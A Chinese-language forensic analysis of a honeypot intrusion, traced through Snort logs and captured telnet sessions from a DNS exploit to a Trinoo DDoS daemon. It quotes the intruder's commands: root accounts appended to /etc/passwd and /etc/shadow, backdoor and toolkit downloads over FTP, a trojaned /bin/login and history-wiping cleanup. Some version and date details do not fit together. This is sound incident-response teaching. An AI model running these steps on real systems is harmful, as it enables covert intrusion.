前言

本文我將要討論的是對(duì)一個(gè)被入侵的系統(tǒng)進(jìn)行逐步地研究，而工具和入侵技術(shù)不作為重點(diǎn)。我們將集中精力討論如何把信息拼揍在一起，來(lái)分析到底發(fā)生了什么事情。我寫這篇文章其目的是幫你在安全領(lǐng)域工作中，如何面對(duì)企業(yè)或組織所遭到的威脅做斗爭(zhēng)。

背景

我在這里介紹的信息是通過(guò)一個(gè)蜜罐技術(shù)而獲得的。這個(gè)蜜罐是安裝Red Hat 9的服務(wù)器。我對(duì)它進(jìn)行默認(rèn)安裝并沒(méi)有作出任何修改，所以這里討論的漏洞都會(huì)存在于任何預(yù)設(shè)安裝的Red Hat 9服務(wù)器中。另外，所有IP地址、用戶賬戶和終端字符在這里都是真實(shí)的，這樣做對(duì)于驗(yàn)證數(shù)據(jù)并給予分析有著更好的了解。Snort是我的嗅探器并且對(duì)于其靈活性、功能和價(jià)格（免費(fèi)），它也是作為入侵檢測(cè)系統(tǒng)的最佳選擇。入侵者采取的所有行動(dòng)都會(huì)被Snort捕捉。另外，在整篇文章中，入侵者的性別已被確定為女性，至于如何獲取入侵者的性別我不會(huì)在此提及到。

入侵

在11月26日的早晨6點(diǎn)43分，Snort提醒我，我的一個(gè)系統(tǒng)遭到了noop攻擊。數(shù)據(jù)包的有效載荷包含noop，它是一個(gè)緩沖區(qū)溢出攻擊的跡象。在這種情況下，Snort已記下了攻擊的記錄，它存放在/var/log/messages文件內(nèi)。注意：172.16.1.107是蜜罐的IP地址。所有其他系統(tǒng)的IP地址均為入侵者所使用的IP地址。

Nov 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

我的蜜罐接受著無(wú)數(shù)次探測(cè)、掃描。然而，這樣的提醒使我注意到，它可能表明系統(tǒng)已被破壞。果然，不到兩分鐘，攻擊者就建立了連接，系統(tǒng)日志顯示系統(tǒng)被破解。

Nov 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0)

Nov 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506)

入侵者獲得了超級(jí)用戶的權(quán)限，而且正在控制著系統(tǒng)。這是怎么完成的，究竟發(fā)生了什么？我們現(xiàn)在就開(kāi)始進(jìn)行分析，把它們拼在一起，一步一步來(lái)。

分析

 

然而我們進(jìn)行分析過(guò)程中，如何知道入侵者從哪里開(kāi)始的呢？入侵者通常從信息收集開(kāi)始，他們需要確定目標(biāo)系統(tǒng)存在什么漏洞。如果你的系統(tǒng)受到了破壞，這通常表明入侵者已不止一次與你的系統(tǒng)進(jìn)行溝通。入侵之前大部分都涉及一些收集資料的操作。因此，對(duì)于入侵者的信息收集階段，也是我們的開(kāi)始。

如果我們從上述情報(bào)來(lái)看，這次入侵發(fā)生在53端口。這表明我們的系統(tǒng)遭到了DNS攻擊。因此，我會(huì)通過(guò)Snort開(kāi)始尋找情報(bào)，并尋找DNS信息的探測(cè)。我們發(fā)現(xiàn)DNS版本探測(cè)信息是從同一個(gè)系統(tǒng)發(fā)來(lái)的。

Nov 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53

Nov 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53

注意探測(cè)的數(shù)據(jù)，即11月25日。我們的系統(tǒng)是11月26日被攻破，來(lái)自同一個(gè)系統(tǒng)。而入侵者只花費(fèi)簡(jiǎn)短的時(shí)間就把系統(tǒng)攻破，我猜測(cè)，它是一種自動(dòng)化工具，是入侵者用來(lái)掃描眾多系統(tǒng)已知DNS漏洞的工具。掃描后離開(kāi)，當(dāng)入侵者審查結(jié)果后確定了存在漏洞的系統(tǒng)（包括我們），然后開(kāi)始她的發(fā)揮?，F(xiàn)在我們已經(jīng)拼湊起來(lái)了我們故事的第一部分。入侵者11月25日對(duì)我們的系統(tǒng)探測(cè)，然后第二天該系統(tǒng)被利用。根據(jù)我的IDS情報(bào)，似乎是由同一個(gè)DNS漏洞的腳本小子擊中。但她如何發(fā)動(dòng)入侵的，它是如何工作的？請(qǐng)繼續(xù)看下面。

漏洞

像大多數(shù)商業(yè)IDS系統(tǒng)一樣，Snort可以顯示我們的所有IP數(shù)據(jù)包。我們將使用此功能進(jìn)行分析漏洞。該漏洞的信息是從Snort的日志獲取的（由Tcpdump二進(jìn)制格式轉(zhuǎn)儲(chǔ)）。我沒(méi)有限制我對(duì)主機(jī)63.236.81.13的查詢，因?yàn)槿肭终呖赡苁褂闷渌到y(tǒng)。其實(shí)是這樣的，因?yàn)槿肭终咧辽偈褂萌N不同的系統(tǒng)來(lái)執(zhí)行漏洞利用（這是我的經(jīng)驗(yàn)）。該漏洞的目標(biāo)是獲取遠(yuǎn)程系統(tǒng)上的一個(gè)Root Shell。一旦入侵者獲得一個(gè)Root shell，她們就可以運(yùn)行任何root命令，請(qǐng)看下面運(yùn)行的命令。

cd /; uname -a; pwd; id;

Linux apple 2.4.18-1.4 #1 Sun Nov 29 22:21:09 GMT 2009 i686 unknown

/

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

echo "twin::506:506::/home/twin:/bin/bash" >> /etc/passwd

echo "twin:w3nT2H0b6AjM2:::::::" >> /etc/shadow

echo "hantu::0:0::/:/bin/bash" >> /etc/passwd

echo "hantu:w3nT2H0b6AjM2:::::::" >> /etc/shadow

入侵者以root身份運(yùn)行多個(gè)命令。首先，她證實(shí)了她的系統(tǒng)（uname -a），目錄（pwd），然后確認(rèn)自己的UID（id）。然后她將兩個(gè)賬戶twin和hantu都設(shè)置為相同的密碼。請(qǐng)注意，twin的UID有兩個(gè)506，hantu的UID有兩個(gè)0。記住，大多數(shù)系統(tǒng)不讓UID 0 telnet到窗口中。于是，她創(chuàng)建一個(gè)賬戶，因?yàn)樗@樣就能夠遠(yuǎn)程訪問(wèn)。因此，入侵者將執(zhí)行Dns漏洞利用從而獲得一個(gè)root shell，然后插入兩個(gè)賬戶。她通過(guò)漏洞利用并在telnet窗口中獲取root權(quán)限僅僅花費(fèi)了90秒鐘。那么，她下一步將作什么？

Nov 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

Nov 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0)

Nov 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506)

獲取

幸運(yùn)的是，Telnet是一種以明文數(shù)據(jù)傳遞的協(xié)議，數(shù)據(jù)沒(méi)有加密。這就意味著我們能夠通過(guò)嗅探器跟蹤和捕獲她的所有擊鍵。Snort已經(jīng)為我們做到了這一點(diǎn)。通過(guò)分析捕捉到的telnet會(huì)話，我們就如入侵者一樣，因?yàn)槲覀儾蹲降牟粌H僅是STDIN（擊鍵），還有STDOUT和STDER。分析telnet會(huì)話后并確定了入侵者的活動(dòng)。

首先，我們的“朋友”telnet（來(lái)自于213.28.22.189）到twin，然后獲得超級(jí)用戶hantu。記住，她不能telnet到具有UID 0的hantu，因?yàn)閷?duì)于遠(yuǎn)程訪問(wèn)這將受到限制。

#' !"'!"# ' 9600,9600'VT5444VT5444

Red Hat Linux release 9

Kernel 2.4.18-1.4 on an i686

login: twin

Password: Password: hax0r

No directory /home/twin!

Logging in with home = "/".

[twin@apple /]$ su hantu

Password: Password: hax0r

第二步，我們的“朋友”FTP到其它服務(wù)器中來(lái)拿取她的工具包。

[root@apple /]# ftp 24.112.167.35

Connected to 24.112.167.35.

220 linux FTP server (Version wu-2.5.0(1) Sat Nov 21 16:48:12 GMT 2009) ready.

Name (24.112.167.35:twin): welek

331 Password required for welek.

Password:password

230 User welek logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> get bj.c

local: bj.c remote: bj.c

200 PORT command successful.

150 Opening BINARY mode data connection for bj.c (1010 bytes).

226 Transfer complete.

1010 bytes received in 0.115 secs (8.6 Kbytes/sec)

ftp> quit

221-You have transferred 1010 bytes in 1 files.

221-Total traffic for this session was 1421 bytes in 1 transfers.

221-Thank you for using the FTP service on linux.

221 Goodbye.

第三步，她獲得了她的后門程序，編譯bj.c并安裝在/sbin/login以將它替換。請(qǐng)注意所有命令提示符下執(zhí)行命令的編譯。

[root@apple /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old                 rm /bin/loginchmod 555 /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cgcc -o login bj.c

bj.c:16: unterminated string or character constant

bj.c:12: possible real start of unterminated constant

她現(xiàn)在試圖執(zhí)行已編譯的后門程序。

[root@apple /]# chown root:bin login

chown: login: No such file or directory

[root@apple /]# chmod 4555 login

chmod: login: No such file or directory

[root@apple /]# chmod u-w login

chmod: login: No such file or directory

[root@apple /]# cp /bin/login /usr/bin/xstat

[root@apple /]# cp /bin/login /usr/bin/old

[root@apple /]# rm /bin/login

[root@apple /]# chmod 555 /usr/bin/xstat

[root@apple /]# chgrp bin /usr/bin/xstat

[root@apple /]# mv login /bin/login

mv: login: No such file or directory

[root@apple /]# rm bj.c

可愛(ài)的朋友，她這次沒(méi)有得到正確的結(jié)果，再試一次。她從FTP站點(diǎn)重新下載了后門程序。

[root@apple /]# ftp 24.112.167.35

Connected to 24.112.167.35.

220 linux FTP server (Version wu-2.5.0(1) Sat Nov 21 16:48:12 GMT 2009) ready.

Name (24.112.167.35:twin): [root@apple /]#   ftp 24.112.167.35

Connected to 24.112.167.35.

220 linux FTP server (Version wu-2.5.0(1) Sat Nov 21 16:48:12 GMT 2009) ready.

Name (24.112.167.35:twin): welek

331 Password required for welek.

Password:331 Password required for welek.

Password:password

230 User welek logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> get bj.c

qulocal: bj.c remote: bj.c

200 PORT command successful.

u150 Opening BINARY mode data connection for bj.c (1011 bytes).

226 Transfer complete.

1011 bytes received in 0.134 secs (7.3 Kbytes/sec)

ftp> itit

221-You have transferred 1011 bytes in 1 files.

221-Total traffic for this session was 1422 bytes in 1 transfers.

221-Thank you for using the FTP service on linux.

221 Goodbye.

現(xiàn)在是她編譯后門程序的第二次嘗試。請(qǐng)注意相同的剪切和粘貼命令使用。

[root@apple /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old                 rm /bin/loginchmod 555 /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cgcc -o login bj.c

bj.c: In function `owned':

bj.c:16: warning: assignment makes pointer from integer without a cast

現(xiàn)在我們看到編譯的后門程序已經(jīng)實(shí)施。有效的/bin/login副本移動(dòng)到/usr/bin/xstat中，而編譯的后門程序bj.c用于替換/bin/login，這是后門程序。

[root@apple /]# chown root:bin login

[root@apple /]# chmod 4555 login

[root@apple /]# chmod u-w login

[root@apple /]# cp /bin/login /usr/bin/xstat

cp: /bin/login: No such file or directory

[root@apple /]# cp /bin/login /usr/bin/old

cp: /bin/login: No such file or directory

[root@apple /]# rm /bin/login

rm: cannot remove `/bin/login': No such file or directory

[root@apple /]# chmod 555 /usr/bin/xstat

[root@apple /]# chgrp bin /usr/bin/xstat

[root@apple /]# mv login /bin/login

現(xiàn)在她開(kāi)始清除她的活動(dòng)痕跡。我認(rèn)為這是一個(gè)腳本，剪切和粘貼。看看她執(zhí)行的所有命令。另外，我確信這是一個(gè)“generic”清理腳本，注意它是如何試圖刪除文件（如/tmp/h）的。

[root@apple /]# rm bj.c

[root@apple /]# [root@apple /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por<grep inetd ; ps -aux | grep portmap ; rm /sbin/port                         map ; rm /tmp/h ; rm /usr<p portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/                         sbin/rpc.portmap ; rm -rf<ap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf                          .bash* ; rm -rf /root/.ba<bin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bas                         h_history ; rm -rf /usr/s<bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sb                         in/named

359 ?        00:00:00 inetd

359 ?        00:00:00 inetd

rm: cannot remove `/tmp/h': No such file or directory

rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory

[root@apple /]# ps -aux | grep portmap

[root@apple /]# [root@apple /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por<grep inetd ; ps -aux | grep portmap ; rm /sbin/port                         map ; rm /tmp/h ; rm /usr<p portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/                         sbin/rpc.portmap ; rm -rf<ap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf                          .bash* ; rm -rf /root/.ba<bin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bas                         h_history ; rm -rf /usr/s<bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sb                         in/named

359 ?        00:00:00 inetd

rm: cannot remove `/sbin/portmap': No such file or directory

rm: cannot remove `/tmp/h': No such file or directory

rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory

[root@apple /]# rm: cannot remove `/sbin/portmap': No such file or directory

我發(fā)現(xiàn)了一些有意思的事情。入侵者通過(guò)generic進(jìn)行清理，但腳本出現(xiàn)了錯(cuò)誤，因?yàn)樗噲D刪除的文件根本不存在。我認(rèn)為我們的“朋友”一定看到了這些錯(cuò)誤信息，因?yàn)樗?dāng)時(shí)在試圖手工刪除這些相同的文件，即使它們不存在。

rm: cannot remove `/tmp/h': No such file or directory

rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory

[root@apple /]# rm: cannot remove `/sbin/portmap': No such file or directory

rm: cannot remove `/tmp/h': No such file or directory

rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory

[root@apple /]# exit

exit

[twin@apple /]$ exit

logout

就這樣，我們的“朋友”安置了一個(gè)后門程序，即bj.c。完成之后，她就立刻從我的系統(tǒng)中退出了。

返回

此系統(tǒng)遭到破壞之后，我把它脫機(jī)并進(jìn)行數(shù)據(jù)審查（比如Tripwire）。不過(guò)，我在下周看到了各種系統(tǒng)正試圖Telnet到此機(jī)器上。顯然，那個(gè)入侵者回來(lái)了，最有可能的是會(huì)對(duì)我的系統(tǒng)進(jìn)行更多的邪惡活動(dòng)。所以，我將此破壞過(guò)的機(jī)器繼續(xù)接入因特網(wǎng)，好奇地看看入侵者，她會(huì)做什么？果然，近兩個(gè)星期后，她回來(lái)了。我再次使用Snort捕捉她的所有按鍵?？纯聪旅娴膖elnet會(huì)話，并研究如何破壞系統(tǒng)，我們將作為Trinoo終端使用。

在12月9日的上午10:45，我們的“朋友”從24.7.85.192發(fā)起了telnet會(huì)話。注意她是如何使用后門程序繞過(guò)身份驗(yàn)證而進(jìn)入系統(tǒng)的。

!"' #'!"# ' 9600,9600'VT9111VT9111

Red Hat Linux release 9

Kernel 2.4.18-1.4 on an i686

[root@apple /]# ls

bin   cdrom  etc     home  lost+found  proc  sbin  usr

boot  dev    floppy  lib   mnt       root  tmp   var

一旦登入系統(tǒng)，她就嘗試使用DNS。

[root@apple /]# nslookup magix

[root@apple /]# nslookup irc.powersurf.com

Server:  zeus-internal.uicmba.edu

Address:  172.16.1.101

我們的“朋友”FTP到位于新加坡的一個(gè)系統(tǒng)并下載一個(gè)新的工具包。注意隱藏的目錄.s，她創(chuàng)建了存儲(chǔ)工具。

[root@apple /]# mkdir .s

[root@apple /]# cd .s

[root@apple /.s]# ftp nusnet-216-35.dynip.nus.edu.sg

ftp: nusnet-216-35.dynip.nus.edu.sg: Unknown host

ftp> qquituit

[root@apple /.s]# ftpr 137.132.216.35

login: ftrp: command not found

[root@apple /.s]#

[root@apple /.s]# ftp 137.132.216.35

Connected to 137.132.216.35.

220 nusnet-216-35.dynip.nus.edu.sg FTP server (Version wu-2.4.2-VR17(1) Thu Nov 19 09:21:53 GMT 2009) ready.

她在我們的窗口中插入相同的用戶名，從而獲得了訪問(wèn)權(quán)限。

Name (137.132.216.35:root): twin

331 Password required for twin.

Password:hax0r

230 User twin logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> get d.tar.gz

local: d.tar.gz remote: d.tar.gz

200 PORT command successful.

150 Opening BINARY mode data connection for d.tar.gz (8323 bytes).

150 Opening BINARY mode data connection for d.tar.gz (8323 bytes).

226 Transfer complete.

8323 bytes received in 1.36 secs (6 Kbytes/sec)

ftp> quit

221-You have transferred 8323 bytes in 1 files.

221-Total traffic for this session was 8770 bytes in 1 transfers.

221-Thank you for using the FTP service on nusnet-216-35.dynip.nus.edu.sg.

221 Goodbye.

[root@apple /.s]# gunzip d*

[root@apple /.s]# tar -xvf d*

daemon/

daemon/ns.c

daemon/ns

[root@apple /.s]# rm -rf d.tar

[root@apple /.s]# cd daemon

[root@apple daemon]# chmod u+u+x nsx ns

[root@apple daemon]# ./ns

入侵者剛剛安裝并啟動(dòng)了Trinoo終端。下一步，她試圖調(diào)換受損的系統(tǒng)。注意，她是如何設(shè)置她的VT TERM。這個(gè)系統(tǒng)很可能也有一個(gè)后門。連接失敗，因?yàn)镈NS不能正常工作。

[root@apple daemon]# TERM=vt1711

[root@apple daemon]# telnet macau.hkg.com

macau.hkg.com: Unknown host

[root@apple daemon]# exit

exit www.2cto.com

我們的“朋友”離開(kāi)了，只是回到了以前的系統(tǒng)（137.132.216.35），并嘗試更多可愛(ài)的調(diào)皮行為。

!"' #'!"# ' 9600,9600'VT9111VT9111

Red Hat Linux release 9

Kernel 2.4.18-1.4 on an i686

apple /]# TERM=vt9111

telnet ns2.cpcc.cc.nc.us

ns2.cpcc.cc.nc.us: Unknown host

@apple /}#telnet 1 152.43.29.52

Trying 152.43.29.52...

Connected to 152.43.29.52.

Escape character is '^]'.

!!!!!!Connection closed by foreign host.

te8ot@apple /]# TERM=vt7877

[root@apple /]# telnet sparky.w

itoot@apple /]# exit

exit

在此之后，不少人認(rèn)為以此作為傀儡機(jī)對(duì)其他系統(tǒng)發(fā)起攻擊，入侵者打算利用此系統(tǒng)從事更多的破壞活動(dòng)。因此，我關(guān)閉了系統(tǒng)。

Dec 9 11:03:20 lisa snort[2370]: IDS/197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444

Dec 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335

Dec 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444

Dec 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335

Dec 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444

Dec 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335

尾聲

我已經(jīng)詳細(xì)論述了我的蜜罐是如何一步一步被攻破的，起初使用后門程序，最后使用Trinoo攻擊。11月25日，入侵者先掃描蜜罐的DNS運(yùn)行著哪一版本。第二天，也就是11月26日，她執(zhí)行了NXT-Howto，并成功獲得了root shell。她獲得了一個(gè)root shell之后，就創(chuàng)建了兩個(gè)系統(tǒng)賬戶，即twin和hantu。在此之后，她立即打開(kāi)telnet窗口，獲得超級(jí)用戶的訪問(wèn)權(quán)限，然后下載并安置了她的后門程序bj.c。然后她執(zhí)行一個(gè)腳本來(lái)掩飾她在系統(tǒng)中留下的痕跡，然后她在幾周之后又試圖連接我的系統(tǒng)，但它處于脫機(jī)狀態(tài)。最后，在12月9日那天，她進(jìn)行了訪問(wèn)、安裝、然后執(zhí)行Trinoo。就在此時(shí)，我把蜜罐脫機(jī)了。

我剛剛涵蓋了分析蜜罐的所有步驟。目標(biāo)是，以確定如何使用入侵檢測(cè)系統(tǒng)和日志進(jìn)行分析被攻破的系統(tǒng)。通過(guò)這種分析方法，你應(yīng)該對(duì)分析被攻擊的系統(tǒng)有更好的理解。如果你想了解更多有關(guān)知識(shí)，你可以通過(guò)Email(Hack01[at]Live.cn)與我交流。

最后我還要感謝所有地下組織成員的貢獻(xiàn)，在一些特殊任務(wù)中，沒(méi)有他們的辛勤工作和交流是不可能完成的。